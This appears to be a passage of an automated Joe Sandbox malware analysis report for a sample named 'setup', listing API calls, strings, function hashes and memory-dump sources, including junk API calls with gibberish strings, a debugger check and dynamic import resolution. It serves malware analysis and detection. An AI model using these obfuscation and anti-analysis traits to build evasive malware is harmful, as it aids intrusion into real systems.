                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction Fuzzy Hash: 3911C471681354BBEB276B259C01BAB779FDF007A4F800426FE09A6240E721D9016AE8
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: D
                • API String ID: 2102423945-2746444292
                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction ID: 91d2a0980f9650f35103f7c9eda40f00c3a058a548559f2f2769beb513f2e343
                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction Fuzzy Hash: B7E16B71D00359EECF65EBA0CD49FEFBBB8AF04304F044069EA4AA6190EB746A45DF54
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: $$$(
                • API String ID: 2102423945-3551151888
                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction ID: cbe814a8e9ceb2d0c2fc161a4ce9ceddcb59172f3e6f5caa45acb504b33e23a1
                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction Fuzzy Hash: 6E91BD71D00318EAEF21DFA0CC59BEEBBB5AF05304F244069D41577280DBB65A48EF69
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction ID: d299c71891cdf90f96dd1472e2e91f590a54813336c2b2ff1e7869b84dd1f9b0
                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction Fuzzy Hash: DE210B3220830C6EEF529AA9DC45BBE77DDDB45360FD04165E90AC6190FB71E940BA94
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: p2Q
                • API String ID: 2102423945-1521255505
                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction ID: b23b4cea6fb2ce2c872308a2dac59b9b22c608c92bb53cf341e59846c09d7d3d
                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction Fuzzy Hash: AFF0ED78699750A5FB21B754BC26B857E917B31F18F104088E1582E2E1E3FD238CB7DA
                APIs
                • std::exception::exception.LIBCMT ref: 020BFBF1
                  • Part of subcall function 020A169C: std::exception::_Copy_str.LIBCMT ref: 020A16B5
                • __CxxThrowException@8.LIBCMT ref: 020BFC06
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                • String ID: TeM$TeM
                • API String ID: 3662862379-3870166017
                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction ID: b0e865e64f8fb14657f8d12f9b4464b9d611c506aee55fc7d2a002c42b823709
                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction Fuzzy Hash: DCD06775C0030CBBCB00EFA5D459CDDBBB9AB04344F408466A91897241EA74A3499F94
                APIs
                  • Part of subcall function 0209197D: __wfsopen.LIBCMT ref: 02091988
                • _fgetws.LIBCMT ref: 0207D15C
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __wfsopen_fgetws
                • String ID:
                • API String ID: 853134316-0
                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction ID: 9f7170d4b0330ea25b839995f513f11acc1f0cd78fe18bf5d2f74d6d3b79761a
                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction Fuzzy Hash: F191C371D00319ABCF21DFA4CD84BEEB7F6BF14314F140529E816A3240E775AA15EBA9
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$__except_handler4_fprintf
                • String ID:
                • API String ID: 1783060780-0
                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction ID: d6f69cea3f7e15ead69d62f43d8d0022f07c86c56c81898b90af65a4e607f5e2
                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction Fuzzy Hash: E9A140B1C00349EBEF11EFA4CC55BDEBB76AF15304F240028D50576291D7B65A48EFA6
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                • String ID:
                • API String ID: 2974526305-0
                • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction ID: 9aafb9fa28406e755de3ab2b905a5ad0317ae6cf62a4f4235ff8bc7623667391
                • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction Fuzzy Hash: 765191B0A00309AFDF2A9F7988806AE77F6AF40324F148729EC37962D0D7719955FB40
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: 2688ba3609dc072478c21a2c85ffb16a62904a3d3952e63894a3e42a264d4740
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: 45013D3240024ABBCF235E84DC51CED7FA2BF19754B488415FA5958430E336C5B1BB81
                APIs
                • ___BuildCatchObject.LIBCMT ref: 02137A4B
                  • Part of subcall function 02138140: ___BuildCatchObjectHelper.LIBCMT ref: 02138172
                  • Part of subcall function 02138140: ___AdjustPointer.LIBCMT ref: 02138189
                • _UnwindNestedFrames.LIBCMT ref: 02137A62
                • ___FrameUnwindToState.LIBCMT ref: 02137A74
                • CallCatchBlock.LIBCMT ref: 02137A98
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                • String ID:
                • API String ID: 2901542994-0
                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction ID: 9a35a1cd0b2030c27c832930cc162ee100f8a9d0b0db46b458af76678dc316f7
                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction Fuzzy Hash: 7C010532040109BFCF12AF55CC00EAA7BABAF48764F158014F91866160C332E962DFA0
                APIs
                • FindExecutableA.SHELL32(00000000,00000000,00000000), ref: 00405C00
                • CoGetInstanceFromFile.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405C18
                • _wprintf.LIBCMT ref: 00405C24
                • _wprintf.LIBCMT ref: 00405C30
                  • Part of subcall function 004094DD: __stbuf.LIBCMT ref: 0040952B
                  • Part of subcall function 004094DD: __output_l.LIBCMT ref: 00409543
                  • Part of subcall function 004094DD: __ftbuf.LIBCMT ref: 00409554
                • _wscanf.LIBCMT ref: 00405C3D
                  • Part of subcall function 004094C0: _vwscanf.LIBCMT ref: 004094D3
                • _wscanf.LIBCMT ref: 00405C4D
                  • Part of subcall function 00409413: DeleteFileA.KERNEL32(?), ref: 0040941B
                  • Part of subcall function 00409413: GetLastError.KERNEL32 ref: 00409425
                  • Part of subcall function 00409413: __dosmaperr.LIBCMT ref: 00409434
                  • Part of subcall function 004093E0: MoveFileA.KERNEL32(?,?), ref: 004093EB
                  • Part of subcall function 004093E0: GetLastError.KERNEL32 ref: 004093F5
                  • Part of subcall function 004093E0: __dosmaperr.LIBCMT ref: 00409404
                • _wprintf.LIBCMT ref: 00405C8B
                • _malloc.LIBCMT ref: 00405C92
                  • Part of subcall function 0040934C: __FF_MSGBANNER.LIBCMT ref: 00409365
                  • Part of subcall function 0040934C: __NMSG_WRITE.LIBCMT ref: 0040936C
                  • Part of subcall function 0040934C: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0040A0EE,00409A0C,00000001,00409A0C,?,00412031,00000018,00418DE8,0000000C,004120C1), ref: 00409391
                  • Part of subcall function 0040929F: _malloc.LIBCMT ref: 004092AD
                • LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 00405CFB
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: File_wprintf$ErrorLast__dosmaperr_malloc_wscanf$AccountAllocDeleteExecutableFindFromHeapInstanceLookupMove__ftbuf__output_l__stbuf_vwscanf
                • String ID: %s %d %f$*gA$0 %f
                • API String ID: 216097146-2802753477
                • Opcode ID: 6c1423a3ec743d6a0c027734e855bfd4626f5f97dddd0510832e8e54d6c82362
                • Instruction ID: bd489db0e87fc7cc01aa0fe857db6aeda3763cf657610c122e5a3c5e76d21110
                • Opcode Fuzzy Hash: 6c1423a3ec743d6a0c027734e855bfd4626f5f97dddd0510832e8e54d6c82362
                • Instruction Fuzzy Hash: D2218175789300B6F260BBA59C43F9A3754AB54B09F10843AF7497A1E2D6F838058B6E
                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,004128EA,?,0040A873,?,000000BC,?,00000001,00000000,00000000), ref: 004122EC
                • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,004128EA,?,0040A873,?,000000BC,?,00000001,00000000,00000000), ref: 00412315
                • GetACP.KERNEL32(?,?,004128EA,?,0040A873,?,000000BC,?,00000001,00000000), ref: 00412329
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: 5858dc6f94d99f83be33dccf630f9b126566a8c49a8850891d887983497bc18c
                • Instruction ID: 541a64dcdbbf5dc7754b7aa8a0ed8816bf62bbf427e2e4fe1483b6cdfe284a96
                • Opcode Fuzzy Hash: 5858dc6f94d99f83be33dccf630f9b126566a8c49a8850891d887983497bc18c
                • Instruction Fuzzy Hash: 4B01D83050020FBAE7259B61DE05BEF76A8BB04758F24406AF901F51D1EBBCCE91929C
                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00410C34
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00410C49
                • UnhandledExceptionFilter.KERNEL32(00402FD8), ref: 00410C54
                • GetCurrentProcess.KERNEL32(C0000409), ref: 00410C70
                • TerminateProcess.KERNEL32(00000000), ref: 00410C77
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID:
                • API String ID: 2579439406-0
                • Opcode ID: 1c95e6085fc9a03cd8e282e37b867c2d2abd5018ee9ce5de8835c00abc25c6fd
                • Instruction ID: 83d3ef2e3e956abaeec0d3a13e97bb118a1a7b19374e6ca3b9f34d0de00b0f34
                • Opcode Fuzzy Hash: 1c95e6085fc9a03cd8e282e37b867c2d2abd5018ee9ce5de8835c00abc25c6fd
                • Instruction Fuzzy Hash: 7121ECB4403204DFD764DFA5ED846643BA0FF2A350F10401AE508AB3B1DF7459CAAF69
                APIs
                • AddRefActCtx.KERNEL32(?), ref: 004058E4
                • GlobalAlloc.KERNEL32(00000000,?), ref: 004058FA
                • FindNextFileW.KERNEL32(00000000,?), ref: 0040593C
                • EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00405954
                • EnumCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040595E
                • GetShortPathNameW.KERNEL32(zedij,?,00000000), ref: 0040596F
                • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00405977
                • _llseek.KERNEL32(00000000,00000000,00000000), ref: 004059A3
                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 004059AC
                • AddAtomW.KERNEL32(fukowoxisiravusehuhedasituwucovefetenaxogukulirevok), ref: 004059CA
                • GetSystemDirectoryW.KERNEL32(?,00000000), ref: 004059DA
                • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 004059E6
                • GetSystemWindowsDirectoryA.KERNEL32(00000000,00000000), ref: 004059F0
                • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004059FE
                • lstrcmpA.KERNEL32(Hanoc yocecaj dij,Fer wadamopenobumi bufexixopi zoz winagemecadis), ref: 00405A0E
                • LoadMenuW.USER32(00000000,00000000), ref: 00405A24
                • AddAtomA.KERNEL32(00000000), ref: 00405A4A
                • SleepEx.KERNEL32(00000000,00000000), ref: 00405A50
                • SetLastError.KERNEL32(00000000), ref: 00405A6F
                • GetCurrentThreadId.KERNEL32 ref: 00405AE9
                • WritePrivateProfileSectionA.KERNEL32(Yidefafisomo hotecuf gibonekupufu rotipowetalix moriwi,Jefi xabusefuvo wamefipafagos gafifasudagetif naya,Katijaw xocuwiyoc), ref: 00405AFA
                • GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000), ref: 00405B0A
                • GlobalLock.KERNEL32(00000000), ref: 00405B0E
                • LocalFlags.KERNEL32(00000000), ref: 00405B37
                • UnhandledExceptionFilter.KERNEL32(00000000), ref: 00405B3E
                • FindNextFileW.KERNEL32(00000000,?), ref: 00405B4A
                • InterlockedCompareExchange.KERNEL32(00000000,00000000,00000000), ref: 00405B57
                • GetModuleHandleW.KERNEL32(00000000), ref: 00405B5E
                • WriteFileGather.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00405B83
                • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00405B8C
                • GetFileAttributesW.KERNEL32(Tenu joyabak), ref: 00405B97
                • OpenWaitableTimerW.KERNEL32(00000000,00000000,Bipovey duz), ref: 00405BA4
                • _memset.LIBCMT ref: 00405BB6
                • SetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00405BC5
                Strings
                • Fer wadamopenobumi bufexixopi zoz winagemecadis, xrefs: 00405A04
                • Katijaw xocuwiyoc, xrefs: 00405AEB
                • Yidefafisomo hotecuf gibonekupufu rotipowetalix moriwi, xrefs: 00405AF5
                • zedij, xrefs: 0040596A
                • fukowoxisiravusehuhedasituwucovefetenaxogukulirevok, xrefs: 004059C5
                • Hanoc yocecaj dij, xrefs: 00405A09
                • Bipovey duz, xrefs: 00405B9D
                • Tenu joyabak, xrefs: 00405B92
                • Jefi xabusefuvo wamefipafagos gafifasudagetif naya, xrefs: 00405AF0
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: File$Enum$CalendarInfo$AtomDirectoryFindGlobalNextSystemThreadWrite$AliasAllocAttributesCodeCommCompareConfigConsoleCopyCurrentDefaultErrorExceptionExchangeExitFilterFlagsFormatsGatherHandleInterlockedLastLoadLocalLockMenuModuleNameOpenPathPrivateProfileResourceSectionShortSleepTimeTimerTypesUnhandledWaitableWindows_llseek_memsetlstrcmp
                • String ID: Bipovey duz$Fer wadamopenobumi bufexixopi zoz winagemecadis$Hanoc yocecaj dij$Jefi xabusefuvo wamefipafagos gafifasudagetif naya$Katijaw xocuwiyoc$Tenu joyabak$Yidefafisomo hotecuf gibonekupufu rotipowetalix moriwi$fukowoxisiravusehuhedasituwucovefetenaxogukulirevok$zedij
                • API String ID: 1264181287-1641724625
                • Opcode ID: 16ddacbd7970175beeaffea6fc4ead55f4ed872aa6678b56829e405714458fab
                • Instruction ID: 14eb3c34b4b3381a2d16236b09038116252d46b83eff13ccc2b5f222a95b0490
                • Opcode Fuzzy Hash: 16ddacbd7970175beeaffea6fc4ead55f4ed872aa6678b56829e405714458fab
                • Instruction Fuzzy Hash: 0281E831644754ABE320EB60DD49F9B3BA8EB49711F00453AFA44B62F0C7B85845CFAE
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0040967E), ref: 0040C8CC
                • __mtterm.LIBCMT ref: 0040C8D8
                  • Part of subcall function 0040C611: DecodePointer.KERNEL32(FFFFFFFF,0040CA3A,?,0040967E), ref: 0040C622
                  • Part of subcall function 0040C611: TlsFree.KERNEL32(FFFFFFFF,0040CA3A,?,0040967E), ref: 0040C63C
                  • Part of subcall function 0040C611: DeleteCriticalSection.KERNEL32(00000000,00000000,000195DC,?,0040CA3A,?,0040967E), ref: 00411F93
                  • Part of subcall function 0040C611: _free.LIBCMT ref: 00411F96
                  • Part of subcall function 0040C611: DeleteCriticalSection.KERNEL32(FFFFFFFF,000195DC,?,0040CA3A,?,0040967E), ref: 00411FBD
                • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,0040967E), ref: 0040C8EE
                • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,0040967E), ref: 0040C8FB
                • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,0040967E), ref: 0040C908
                • GetProcAddress.KERNEL32(00000000,FlsFree,?,0040967E), ref: 0040C915
                • TlsAlloc.KERNEL32(?,0040967E), ref: 0040C965
                • TlsSetValue.KERNEL32(00000000,?,0040967E), ref: 0040C980
                • __init_pointers.LIBCMT ref: 0040C98A
                • EncodePointer.KERNEL32(?,0040967E), ref: 0040C99B
                • EncodePointer.KERNEL32(?,0040967E), ref: 0040C9A8
                • EncodePointer.KERNEL32(?,0040967E), ref: 0040C9B5
                • EncodePointer.KERNEL32(?,0040967E), ref: 0040C9C2
                • DecodePointer.KERNEL32(0040C795,?,0040967E), ref: 0040C9E3
                • __calloc_crt.LIBCMT ref: 0040C9F8
                • DecodePointer.KERNEL32(00000000,?,0040967E), ref: 0040CA12
                • GetCurrentThreadId.KERNEL32(?,0040967E), ref: 0040CA24
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                • API String ID: 3698121176-3819984048
                • Opcode ID: 4c548b5ebd70f1ed609b171aff1d1ebf0c11147434c4e9f974672cb379db3375
                • Instruction ID: 762f5b1bd2ab1e6807458a6a7b7d8c4e65e818df7965408c3995a9aac59ad9f7
                • Opcode Fuzzy Hash: 4c548b5ebd70f1ed609b171aff1d1ebf0c11147434c4e9f974672cb379db3375
                • Instruction Fuzzy Hash: BF317430901710DBD721DFB5AD4862A3AA4AF66B607144A3BF450A22F0DF78D446AF98
                APIs
                • LoadLibraryA.KERNEL32(004AC9E8), ref: 00405471
                • GetProcAddress.KERNEL32(?,004AC9E8,14CA3371,3E1D73B5,072691CE,613763C9,1062CE7E,3926FB15,768B5F15,3E1D73B5,605FDAD6,613763C9,0133DA9A,3E1D73B5,298F1A4D,26209A8A), ref: 00405866
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: %b5;$0P%G$IVE$Jb%$Jo $V%7($mn@$oQZ$kiu
                • API String ID: 2574300362-1792616812
                • Opcode ID: faf5d24532d9e5c2fb9d6e16dd12adac41eaab7f8bd8b53d7e58a87a1164c013
                • Instruction ID: 3c93bbe8d78a3f5d559adcfe0d16eff1c9bcb5cd25698e4889c3577372872ef2
                • Opcode Fuzzy Hash: faf5d24532d9e5c2fb9d6e16dd12adac41eaab7f8bd8b53d7e58a87a1164c013
                • Instruction Fuzzy Hash: 6AA1EBB5608384CFC254CF6AD48960AFBF4BB99358F644A0CF5A59B620C374DA85CF4B
                APIs
                • CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040534F
                • CreateEventW.KERNEL32(00000000,00000000,00000000,Bedowe cukon nov), ref: 00405360
                • GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 0040536F
                • GetFirmwareEnvironmentVariableW.KERNEL32(Voyapeyifer hivaco takari yusu sop,Pogixucugal,?,00000000), ref: 00405389
                • ReadConsoleInputW.KERNEL32(00000000,?,00000000), ref: 0040539C
                • PulseEvent.KERNEL32(00000000), ref: 004053A4
                • FindFirstVolumeMountPointA.KERNEL32(Nigiwiyu sece,?,00000000), ref: 004053B9
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: Event$ConsoleCopyCreateEnvironmentFileFindFirmwareFirstInfoInputMountPointPulseReadVariableVolume
                • String ID: Bedowe cukon nov$Nigiwiyu sece$Pogixucugal$Voyapeyifer hivaco takari yusu sop
                • API String ID: 3897010762-909827944
                • Opcode ID: a4d785b26d73acf3e2d6712bc49d466d9852393de91d21f94da9999cc76b2c1d
                • Instruction ID: 5699f872e795e21c22ec82fd81d665cf1610561aae1d5e1e9a46aa77a3125b41
                • Opcode Fuzzy Hash: a4d785b26d73acf3e2d6712bc49d466d9852393de91d21f94da9999cc76b2c1d
                • Instruction Fuzzy Hash: B911CA35348381EFE330DB50DC4AFA577A4BB9A701F108069F684B62E1DAB41549CF67
                APIs
                • __getptd_noexit.LIBCMT ref: 0040B460
                  • Part of subcall function 0040C702: GetLastError.KERNEL32(00000100,00000001,0040C783,00000001,004097A3,?,?,00409A0C,?,00000001), ref: 0040C706
                  • Part of subcall function 0040C702: ___set_flsgetvalue.LIBCMT ref: 0040C714
                  • Part of subcall function 0040C702: __calloc_crt.LIBCMT ref: 0040C728
                  • Part of subcall function 0040C702: DecodePointer.KERNEL32(00000000,?,00409A0C,?,00000001), ref: 0040C742
                  • Part of subcall function 0040C702: GetCurrentThreadId.KERNEL32(?,00409A0C,?,00000001), ref: 0040C758
                  • Part of subcall function 0040C702: SetLastError.KERNEL32(00000000,?,00409A0C,?,00000001), ref: 0040C770
                • __calloc_crt.LIBCMT ref: 0040B482
                • __get_sys_err_msg.LIBCMT ref: 0040B4A0
                • _strcpy_s.LIBCMT ref: 0040B4A8
                • __invoke_watson.LIBCMT ref: 0040B4BD
                • _raise.LIBCMT ref: 0040B4CE
                • __call_reportfault.LIBCMT ref: 0040B4E6
                Strings
                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 0040B46D, 0040B490
                Memory Dump Source
                • Source File: 00000006.00000002.2127089394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000006.00000002.2127045676.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127177102.000000000041A000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000006.00000002.2127253382.000000000052B000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_400000_setup.jbxd
                Similarity
                • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__call_reportfault__get_sys_err_msg__getptd_noexit__invoke_watson_raise_strcpy_s
                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                • API String ID: 1417603120-798102604
                • Opcode ID: 9f70c00b1387444281d67d95fce6b3c332b958c045866739d762a51525849dea
                • Instruction ID: 8a29dfca28fc1b4608df53a759f7606d4bc13e036d648c85fe0275d7da9ef403
                • Opcode Fuzzy Hash: 9f70c00b1387444281d67d95fce6b3c332b958c045866739d762a51525849dea
                • Instruction Fuzzy Hash: 4111E67164030867E720BA569C46B6B3799DB84728F14853FFA09BB7C3DB799E0082DD
                APIs
                • __CxxThrowException@8.LIBCMT ref: 004063C3
                  • Part of subcall function 00409248: RaiseException.KERNEL32(?,?,00409247,?,?,?,?,?,00409247,?,004185EC,0052833C), ref: 0040928A
                • __CxxThrowException@8.LIBCMT ref: 004063F2
